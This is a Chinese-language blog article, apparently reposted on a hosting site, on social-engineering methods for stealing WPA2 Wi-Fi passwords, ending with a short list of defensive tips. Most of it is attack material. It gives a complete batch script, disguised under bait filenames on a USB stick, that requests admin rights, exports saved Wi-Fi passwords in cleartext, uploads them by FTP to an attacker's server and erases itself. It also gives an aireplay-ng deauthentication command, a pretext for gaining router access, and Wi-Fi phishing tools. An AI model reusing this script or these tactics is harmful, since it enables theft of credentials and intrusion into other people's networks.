常见社工破解WPA2密码方法及防范措施

1. 前言

何为社工?社工是一种通过利用受害者心理弱点,如本能反应、好奇心、同情心、信任、贪婪等进行诸如欺骗、盗取、控制等非法手段的一种攻击方式。在无线安全中也可以利用社工做到许多非法操作。下面举几个利用社工盗取wpa2密码的例子。

2. 移动存储攻击

某宝小容量u盘,在u盘中存放一个bat批处理文件,并命名为诱使人点开的标题,如:windows电脑优化、私人照片等等。其实bat文件的内容是这个:

  1. @echo off  
  2. >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"  
  3. if '%errorlevel%' NEQ '0' (  
  4. goto UACPrompt  
  5. ) else ( goto gotAdmin )  
  6. :UACPrompt  
  7. echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"  
  8. echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"  
  9. "%temp%\getadmin.vbs"  
  10. exit /B  
  11. :gotAdmin  
  12. if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" )  
  13. md c:\win  
  14. netsh wlan export profile key=clear folder=c:\win  
  15. echo open 服务器ip>C:\config.txt  
  16. echo user 账号>>C:\config.txt  
  17. echo 密码>>C:\config.txt  
  18. echo mput c:\win\*.xml>>C:\config.txt  
  19. echo yes>>C:\config.txt  
  20. echo yes>>C:\config.txt  
  21. echo yes>>C:\config.txt  
  22. echo yes>>C:\config.txt  
  23. echo yes>>C:\config.txt  
  24. echo yes>>C:\config.txt  
  25. echo yes>>C:\config.txt  
  26. echo yes>>C:\config.txt  
  27. echo yes>>C:\config.txt  
  28. echo yes>>C:\config.txt  
  29. echo yes>>C:\config.txt  
  30. echo yes>>C:\config.txt  
  31. echo yes>>C:\config.txt  
  32. echo yes>>C:\config.txt  
  33. echo yes>>C:\config.txt  
  34. echo yes>>C:\config.txt  
  35. echo yes>>C:\config.txt  
  36. echo yes>>C:\config.txt  
  37. echo yes>>C:\config.txt  
  38. echo yes>>C:\config.txt  
  39. echo yes>>C:\config.txt  
  40. echo yes>>C:\config.txt  
  41. echo yes>>C:\config.txt  
  42. echo yes>>C:\config.txt  
  43. echo yes>>C:\config.txt  
  44. echo yes>>C:\config.txt  
  45. echo yes>>C:\config.txt  
  46. echo yes>>C:\config.txt  
  47. echo yes>>C:\config.txt  
  48. echo yes>>C:\config.txt  
  49. echo yes>>C:\config.txt  
  50. echo yes>>C:\config.txt  
  51. echo yes>>C:\config.txt  
  52. echo yes>>C:\config.txt  
  53. echo yes>>C:\config.txt  
  54. echo yes>>C:\config.txt  
  55. echo yes>>C:\config.txt  
  56. echo yes>>C:\config.txt  
  57. echo yes>>C:\config.txt  
  58. echo yes>>C:\config.txt  
  59. echo yes>>C:\config.txt  
  60. echo yes>>C:\config.txt  
  61. echo yes>>C:\config.txt  
  62. echo yes>>C:\config.txt  
  63. echo yes>>C:\config.txt  
  64. echo yes>>C:\config.txt  
  65. echo yes>>C:\config.txt  
  66. echo yes>>C:\config.txt 
  67. echo yes>>C:\config.txt  
  68. echo yes>>C:\config.txt  
  69. echo yes>>C:\config.txt  
  70. echo yes>>C:\config.txt  
  71. echo yes>>C:\config.txt  
  72. echo bye>>C:\config.txt  
  73. ftp -n -s:"C:\config.txt"  
  74. del C:\config.txt  
  75. del C:\win\*.xml  
  76. del %0 

这个bat脚本会读取本机连接过的wifi信息(包括密码)打包到一个文件夹里并全部put到服务器上,然后删除痕迹和自身防止服务器信息泄露。最后攻击者就可以在自己的ftp服务器里挑选自己中意的wifi了。

攻击演示:

打开此脚本

弹出cmd界面,1秒后消失(太快了不好截),bat脚本也随之消失

查看ftp服务器

wifi信息已经put上来了

进入服务器打开一个xml文件

就拿到了密码

可以自己在里面添加功能使社工效果更好,例如脚本名称命名为某某公司有奖问卷调查,并添加打开调查问卷的命令,使攻击神不知鬼不觉。

3. 直接接触受害者

(1) 使用Deauthentication攻击

  1. aireplay-ng –deauth 10000 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0 

在下班休息的时候(这个时候普遍在使用网络)对受害者使用断网攻击,等一小时后去敲门,询问网络是否故障,询问网络是哪家公司配置的,然后声称自己的网络也故障了,是一样的公司,然后询问报修电话并拨打,其实拨打的是其他人或根本没有拨打,然后假装是保修人员提示让自己重启路由器,攻击者就可以接触到受害者路由器,运气好的话路由器背面有pin码,就可以撤退了。如果没有,攻击者就进一步施压,假装被保修人员提示打开路由器管理界面在管理界面重启路由器,乘机看到密码。重启完毕后手机ssh连接kali停止攻击,造成重启成功修复网络的假象,然后撤退。

(2) 结合移动存储攻击,配合badusb,谎称有重要文件需要发送然而手机没电了,家里人还没下班。第一天进公司不想留下坏印象,从而直接接触受害者电脑,插入badusb,执行bat脚本或木马

(3) 谎称自己是某某公司或某某大学的,正在进行网民安全意识的问卷调查,并将其中带有提问wifi密码的问卷递交受害者,从而获得wifi密码

4. wifi钓鱼

利用fluxion、wifiphisher等工具实施钓鱼攻击:

  • https://github.com/FluxionNetwork/fluxion
  • https://github.com/sophron/wifiphisher ——项目地址

它们的大概原理是抓取受害者客户端与wifi的握手包,对目标客户端实施wifi拒绝服务攻击,发送大量解离包,然后伪造一个相同名称的ap,受害者连接伪造的ap后会被解析到这个页面:

受害者输入密码后会自动与抓取的握手包进行比对,若正确,则停止拒绝服务攻击。网上有很多wifi钓鱼的教程,这里就不再阐述。

4. 防御措施

  • 绑定mac地址,设置白名单,只允许自己的机器连接wifi
  • 隐藏wifi广播,避免自己成为目标
  • 不要插入来路不明的u盘,不要打开来路不明的程序,不要连接来路不明的无线信号
  • 尽量不让陌生人接触到自己的设备
  • wifi最好使用wpa2加密,并使密码复杂度越高越好,尽量别在密码里使用和自己有关的信息
  • 定期更换路由器管理界面密码和wifi密码
  • 最好关闭路由器上的wps功能
  • 尽量不使用wifi万能钥匙等类似软件

文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/121415.html<

(0)
运维的头像运维
上一篇2025-02-21 21:04
下一篇 2025-02-21 21:05

相关推荐

  • 企业防护应重视网站系统安全

    网站系统安全作为企业网络安全防护的重头戏,网络管理员不可掉以轻心。企业网站作为企业的脸面,如果一旦被入侵可能会使企业受到资金损失不说,黑客通过挂马等方式威胁到了用户安全,导致企业信…

  • 克服混合多云世界中的数据保护挑战

    云计算正在迅速发展。如今,将应用和数据迁移到云端的选项有很多,包括从公有云和私有云到混合云服务类型的各种部署模型。组织正在寻求利用多种云平台作为其更广泛数字战略一部分的方法。借助多…

  • 为什么针对API的Bot自动化攻击越来越多?

    API是连接现代应用程序的基石,越来越多的企业意识到API的重要性,其数量迎来爆发式增长,但API面临的安全威胁却比API调用增长更加迅猛。Salt Security于今年2月发布…

  • 企业如何进行合理的安全投资?

    如何在安全上进行投资?在信息安全领域这也许是最具挑战性和争议性的话题。首先是FUD——恐惧、不确定性和怀疑。没有可以衡量的指标或提供具体的数据结果,高管们只是因为害怕而花钱。这个理…

  • 从注册表切断一切黑客入侵的路径

    在网络给我们的工作学习带来极大方便的同时,病毒、木马、后门以及黑客程序也严重影响着信息的安全。这些程序感染计算机的一个共同特点是在注册表中写入信息,来达到如自动运行、破坏和传播等目…

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注